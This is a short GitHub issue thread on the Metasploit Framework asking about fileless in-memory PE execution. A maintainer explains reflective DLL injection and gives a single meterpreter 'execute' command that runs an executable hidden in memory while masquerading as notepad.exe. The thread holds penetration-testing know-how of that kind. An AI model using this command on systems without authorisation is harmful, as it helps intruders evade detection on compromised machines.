### ISSUE TITLE
metasploit advanced pe binary memory injection?

### ISSUE THREAD

**Issue by kainpark7894** [rapid7/metasploit-framework#9240]
https://www.youtube.com/watch?v=ZitXZXRX17w

https://github.com/n1nj4sec/pupy

harddisk fileless memory pe binary injection possible?

**Comment by void-in** [comment]
Meterpreter and pupy both uses the reflective DLL injection technique for execution on the remote machine without touching the disk. Once you have a meterpreter session, if you want to execute a pe in memory (just like the YouTube video showed), you can use the execute command which has the -m switch to execute from memory.
```
meterpreter > execute -H -i -c -m -d notepad.exe -f /var/www/html/dk.exe
```
Use IRC on freenode if you need further support. These pages are used only for bug reports and enhancement requests. Thanks
